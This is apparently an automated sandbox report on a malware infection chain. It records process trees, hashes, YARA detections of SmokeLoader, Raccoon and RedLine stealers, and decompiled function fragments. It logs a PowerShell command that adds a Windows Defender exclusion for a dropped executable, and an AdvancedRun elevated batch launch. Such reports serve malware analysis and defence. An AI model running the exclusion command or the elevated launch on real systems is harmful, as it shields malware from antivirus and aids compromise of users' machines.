                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\5508.exe
                                                                                                                          Imagebase:0xf70000
                                                                                                                          File size:161280 bytes
                                                                                                                          MD5 hash:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                          Yara matches:
                                                                                                                          • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\5508.exe, Author: Florian Roth
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 43%, ReversingLabs
                                                                                                                          Reputation:moderate

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: AdvancedRun.exe PID: 400 Parent PID: 6148

                                                                                                                          General

                                                                                                                          Start time:17:06:51
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:91000 bytes
                                                                                                                          MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 3%, Metadefender, Browse
                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                          Reputation:moderate

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: 6630.exe PID: 6420 Parent PID: 3292

                                                                                                                          General

                                                                                                                          Start time:17:06:54
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\6630.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\6630.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:348672 bytes
                                                                                                                          MD5 hash:539C39A9565CD4B120E5EB121E45C3C2
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.455599908.0000000004910000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000022.00000002.456636829.0000000004A41000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                          • Detection: 45%, ReversingLabs
                                                                                                                          Reputation:low

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: AdvancedRun.exe PID: 772 Parent PID: 400

                                                                                                                          General

                                                                                                                          Start time:17:06:56
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /SpecialRun 4101d8 400
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:91000 bytes
                                                                                                                          MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: B644.exe PID: 6896 Parent PID: 3292

                                                                                                                          General

                                                                                                                          Start time:17:06:59
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\B644.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Users\user~1\AppData\Local\Temp\B644.exe
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:603136 bytes
                                                                                                                          MD5 hash:5EB13887D3DC0B841AACC50770A87213
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Raccoon, Description: Yara detected Raccoon Stealer, Source: 00000025.00000003.445981143.0000000004850000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 100%, Joe Sandbox ML

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: powershell.exe PID: 6932 Parent PID: 6148

                                                                                                                          General

                                                                                                                          Start time:17:07:03
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force
                                                                                                                          Imagebase:0x1110000
                                                                                                                          File size:430592 bytes
                                                                                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: conhost.exe PID: 6940 Parent PID: 6932

                                                                                                                          General

                                                                                                                          Start time:17:07:04
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff774ee0000
                                                                                                                          File size:625664 bytes
                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: aspnet_regbrowsers.exe PID: 6976 Parent PID: 6148

                                                                                                                          General

                                                                                                                          Start time:17:07:09
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                                                                                                                          Imagebase:0xaf0000
                                                                                                                          File size:45160 bytes
                                                                                                                          MD5 hash:B490A24A9328FD89155F075FA26C0DEC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.469526314.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.472626194.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.471109376.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000028.00000000.473648101.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                          Chronological Activities

                                                                                                                          Analysis Process: AdvancedRun.exe PID: 7116 Parent PID: 6284

                                                                                                                          General

                                                                                                                          Start time:17:07:12
                                                                                                                          Start date:29/10/2021
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:91000 bytes
                                                                                                                          MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 3%, Metadefender, Browse
                                                                                                                          • Detection: 0%, ReversingLabs

                                                                                                                          Chronological Activities

                                                                                                                          Disassembly

                                                                                                                          Code Analysis

                                                                                                                          Reset < >

                                                                                                                            Analysis Process: SYzU0M7gx6.exe PID: 6048 Parent PID: 6096 SYzU0M7gx6.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 004249E0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEncodePointer.NTDLL(00000000,?,0041D39B,?,?,00424B50), ref: 004249E7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.248729115.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.248725973.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.248755500.000000000043E000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.248986471.0000000002B36000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: EncodePointer
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2118026453-0
                                                                                                                            • Opcode ID: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
                                                                                                                            • Instruction ID: d35c21fdf9697fae3b8ca4ac9df821949a654717cf36e16e5de8d48c8df027d1
                                                                                                                            • Opcode Fuzzy Hash: 2ea03846aa0b567229e74ed0acf05d785ccbcc0ad5cbdc7d91d64925a7e8509b
                                                                                                                            • Instruction Fuzzy Hash: 10A01132088208A3C2002282A80AF023A0CE3CCBA2F080020F20C0A0A00AA2A82080AA
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041CBE0, Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			_entry_() {
				void* _t3;
				void* _t4;

				E00421DB0(); // executed
				return L0041CC00(_t3, _t4);
			}





                                                                                                                            0x0041cbe5
                                                                                                                            0x0041cbf0

                                                                                                                            APIs
                                                                                                                            • ___security_init_cookie.LIBCMTD ref: 0041CBE5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.248729115.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.248725973.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.248755500.000000000043E000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.248986471.0000000002B36000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ___security_init_cookie
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3657697845-0
                                                                                                                            • Opcode ID: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
                                                                                                                            • Instruction ID: dff1e20f130a88623ecd41cbc2d34482e98b498362f8ffa3102c2fc22eb9c7d8
                                                                                                                            • Opcode Fuzzy Hash: 989a3b1cde8d75633caca1be5d45cca953f1b250fff02efc506c9fb5d63ec8e4
                                                                                                                            • Instruction Fuzzy Hash: 15A0022515466856019033A71847E8A755D58D07587D6411A751D021136C5CBD5140EE
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00426790, Relevance: 7.6, APIs: 5, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 85%
                                                                                                                            			E00426790(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				long _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				intOrPtr _t25;
				intOrPtr* _t29;
				void* _t34;

				_t25 = __esi;
				_t24 = __edi;
				_t22 = __edx;
				_t20 = __ecx;
				_t19 = __ebx;
				_t6 = __eax;
				_t34 = _t20 -  *0x43e494; // 0x2e84a6eb
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x43ff40 = _t6;
				 *0x43ff3c = _t20;
				 *0x43ff38 = _t22;
				 *0x43ff34 = _t19;
				 *0x43ff30 = _t25;
				 *0x43ff2c = _t24;
				 *0x43ff58 = ss;
				 *0x43ff4c = cs;
				 *0x43ff28 = ds;
				 *0x43ff24 = es;
				 *0x43ff20 = fs;
				 *0x43ff1c = gs;
				asm("pushfd");
				_pop( *0x43ff50);
				 *0x43ff44 =  *_t29;
				 *0x43ff48 = _v0;
				 *0x43ff54 =  &_a4;
				 *0x43fe90 = 0x10001;
				_t11 =  *0x43ff48; // 0x0
				 *0x43fe44 = _t11;
				 *0x43fe38 = 0xc0000409;
				 *0x43fe3c = 1;
				_t21 =  *0x43e494; // 0x2e84a6eb
				_v812 = _t21;
				_t23 =  *0x43e498; // 0xd17b5914
				_v808 = _t23;
				 *0x43fe88 = IsDebuggerPresent();
				_push(1);
				E00426770(_t12);
				SetUnhandledExceptionFilter(0);
				_t15 = UnhandledExceptionFilter(0x409f14);
				if( *0x43fe88 == 0) {
					_push(1);
					E00426770(_t15);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                            0x00426790
                                                                                                                            0x00426790
                                                                                                                            0x00426790
                                                                                                                            0x00426790
                                                                                                                            0x00426790
                                                                                                                            0x00426790
                                                                                                                            0x00426790
                                                                                                                            0x00426796
                                                                                                                            0x00426798
                                                                                                                            0x00426798
                                                                                                                            0x0042ecfb
                                                                                                                            0x0042ed00
                                                                                                                            0x0042ed06
                                                                                                                            0x0042ed0c
                                                                                                                            0x0042ed12
                                                                                                                            0x0042ed18
                                                                                                                            0x0042ed1e
                                                                                                                            0x0042ed25
                                                                                                                            0x0042ed2c
                                                                                                                            0x0042ed33
                                                                                                                            0x0042ed3a
                                                                                                                            0x0042ed41
                                                                                                                            0x0042ed48
                                                                                                                            0x0042ed49
                                                                                                                            0x0042ed52
                                                                                                                            0x0042ed5a
                                                                                                                            0x0042ed62
                                                                                                                            0x0042ed6d
                                                                                                                            0x0042ed77
                                                                                                                            0x0042ed7c
                                                                                                                            0x0042ed81
                                                                                                                            0x0042ed8b
                                                                                                                            0x0042ed95
                                                                                                                            0x0042ed9b
                                                                                                                            0x0042eda1
                                                                                                                            0x0042eda7
                                                                                                                            0x0042edb3
                                                                                                                            0x0042edb8
                                                                                                                            0x0042edba
                                                                                                                            0x0042edc4
                                                                                                                            0x0042edcf
                                                                                                                            0x0042eddc
                                                                                                                            0x0042edde
                                                                                                                            0x0042ede0
                                                                                                                            0x0042ede5
                                                                                                                            0x0042edfd

                                                                                                                            APIs
                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0042EDAD
                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0042EDC4
                                                                                                                            • UnhandledExceptionFilter.KERNEL32(00409F14), ref: 0042EDCF
                                                                                                                            • GetCurrentProcess.KERNEL32(C0000409), ref: 0042EDED
                                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 0042EDF4
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.248729115.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.248725973.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.248755500.000000000043E000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000000.00000002.248986471.0000000002B36000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2579439406-0
                                                                                                                            • Opcode ID: ec5799c425ddf0c343165b590ee265faa62188accbdfc7862bd0b4e9a472a92c
                                                                                                                            • Instruction ID: a4823219600351bfb67d8a7c7dbab3907f4e67d721221e37a99db28726f0126c
                                                                                                                            • Opcode Fuzzy Hash: ec5799c425ddf0c343165b590ee265faa62188accbdfc7862bd0b4e9a472a92c
                                                                                                                            • Instruction Fuzzy Hash: 6F211EB9D012009BC300DF65FA866487BA0BB5E315F50207BED08973B2E7B45989CF4E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Analysis Process: SYzU0M7gx6.exe PID: 852 Parent PID: 6048 SYzU0M7gx6.exeCOMMON

                                                                                                                            Executed Functions

                                                                                                                            Function 004017EA, Relevance: 3.1, APIs: 2, Instructions: 54sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
                                                                                                                            • Instruction ID: e26adff564c5d3d37a4e8030c80122da76794021b5cb737f4d399c49089bd509
                                                                                                                            • Opcode Fuzzy Hash: 093506dd62a563d0441f59a8a05229de1ffc0c7044889409d056a06326e13c21
                                                                                                                            • Instruction Fuzzy Hash: 7001B537604205EADB007EB59D819A93B68AF04365F248777BA12B91F1C938C652A71B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040185B, Relevance: 3.0, APIs: 2, Instructions: 50sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
                                                                                                                            • Instruction ID: a7be6de418827693af2ab350a5dd922dd862006562865765dfea97ffb81bfcac
                                                                                                                            • Opcode Fuzzy Hash: 1770049ace98a7458e43cc493052677b39fde3cfbd9b887cff6db6baf57fddbe
                                                                                                                            • Instruction Fuzzy Hash: BF014F33604204FAEB047A929C45DAA3628AB04355F30C533BA13B90F1D97CCB12A72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401866, Relevance: 3.0, APIs: 2, Instructions: 45sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
                                                                                                                            • Instruction ID: e54376f1e00a1b05e1b0a4da34ea36749e6d38f0b530b75836749d90234edb27
                                                                                                                            • Opcode Fuzzy Hash: dc1226d4bc2db8ad8be4ba055d694b18d68c57301a1c136da16781e7116eb212
                                                                                                                            • Instruction Fuzzy Hash: DB018637604204EBDB047AD29C41EAA3725AF14315F24C177FE12BA0F1D53D8712A72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401884, Relevance: 3.0, APIs: 2, Instructions: 40sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
                                                                                                                            • Instruction ID: 5cccd4a7217d25da87a080ae0d04b05742d3a6582cdde403d0d4fd1f208729a0
                                                                                                                            • Opcode Fuzzy Hash: 06c47be1babc5c9914373f87bf5e5a6e30058494f01aa4c1fe81d8ba10f9d84d
                                                                                                                            • Instruction Fuzzy Hash: DFF01237644205FBDB047A919C41EAA3729AF44355F20C137BB13790F1C57C8652A72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040187A, Relevance: 3.0, APIs: 2, Instructions: 39sleepnativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401896
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessSleepTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 417527130-0
                                                                                                                            • Opcode ID: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
                                                                                                                            • Instruction ID: 5d822ad72a3bc969102d855418471fb3ff8b776078c2435d27f60d427d7e2b1d
                                                                                                                            • Opcode Fuzzy Hash: d2cc8ded923418a485b63d44c0e9af69491e3bef1ae54f85540c04aa078cd151
                                                                                                                            • Instruction Fuzzy Hash: 88F0FF33604205EBDB047AD59C41EAA3729AF04315F20C537BA12790F1CA3D8612AB2B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004018D3, Relevance: 1.5, APIs: 1, Instructions: 45nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 46%
                                                                                                                            			E004018D3(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {

				 *__eax =  *__eax + __eax;
				__eax = L0040118A(__eax, __ebx, __ecx, __edi, __eflags);
				_pop(__edi);
				_pop(__ebx);
				__esp = __ebp;
				_pop(__ebp);
				return __eax;
			}



                                                                                                                            0x004018db
                                                                                                                            0x004018e5
                                                                                                                            0x004018ea
                                                                                                                            0x004018ec
                                                                                                                            0x004018ed
                                                                                                                            0x004018ed
                                                                                                                            0x004018ee

                                                                                                                            APIs
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560597551-0
                                                                                                                            • Opcode ID: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
                                                                                                                            • Instruction ID: 169e4967cc86e0c75baf1baab42a0cf60a3c7d0871e4951e2e4ac70a2d426d6d
                                                                                                                            • Opcode Fuzzy Hash: 2828a8cd754e6382065d6a4fb934443d5e18941ecfa79c6ebd95b6c34ee4dc7b
                                                                                                                            • Instruction Fuzzy Hash: 49F0C873604150EBD7013AA19C42AF63769EF01321F248137F923A50F1C63D8612B72B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401888, Relevance: 1.5, APIs: 1, Instructions: 37nativeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004018BE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessTerminate
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 560597551-0
                                                                                                                            • Opcode ID: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
                                                                                                                            • Instruction ID: 934e5413d765c160eebb9f9f9fdb0e9e8b4c73449cfdb306a0b7eda1d20c3935
                                                                                                                            • Opcode Fuzzy Hash: 2a49fbe38ca64fb741f40d4948de9f53ca9b58de087dcfee36be181988c04280
                                                                                                                            • Instruction Fuzzy Hash: 70F03073604104EADB007A959C41AAA3359FB05325F248537BE13B50E1C63D8612B727
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Non-executed Functions

                                                                                                                            Function 004015DB, Relevance: .1, Instructions: 55COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ed2891f3b553ceccb1197e576bb3cc6c62237795c24559e61feaca1efd6c1519
                                                                                                                            • Instruction ID: fd271a60069478d9e85e2fad7deaa7712c787be95f3be9aeab1b4b987b801010
                                                                                                                            • Opcode Fuzzy Hash: ed2891f3b553ceccb1197e576bb3cc6c62237795c24559e61feaca1efd6c1519
                                                                                                                            • Instruction Fuzzy Hash: D901AF73818B07AB43709A7C4D8901E7F955A91230B494B6DB672B3EFAE634C90283C5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040156A, Relevance: .0, Instructions: 44COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 98ce89cfeeb5ddd9997256b5ea2b205477bd2588cb9c6c16e4865f99cdeb7182
                                                                                                                            • Instruction ID: 4f6bc8fa09aa5bdcf42d43fc69351f521f911aca1d628afa7bc85602f15907e6
                                                                                                                            • Opcode Fuzzy Hash: 98ce89cfeeb5ddd9997256b5ea2b205477bd2588cb9c6c16e4865f99cdeb7182
                                                                                                                            • Instruction Fuzzy Hash: 0D019E76558F0B6F43509D3C4A8554ABF525A9A1307C40B2CB272B3BFAD734C5018380
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040163B, Relevance: .0, Instructions: 14COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.306502177.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 00b9d1c930405a9e521bac72b58a8e4ce3d6aa83d2bf40b4aa186e223dc26d8b
                                                                                                                            • Instruction ID: 654c97a3283950a455190b9e492aed8f63260678440c25cc401c338180771753
                                                                                                                            • Opcode Fuzzy Hash: 00b9d1c930405a9e521bac72b58a8e4ce3d6aa83d2bf40b4aa186e223dc26d8b
                                                                                                                            • Instruction Fuzzy Hash: 1BD022B2474A16120612853C0C4802E7E0A08C31303C50F443633F30FDC218890743C4
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

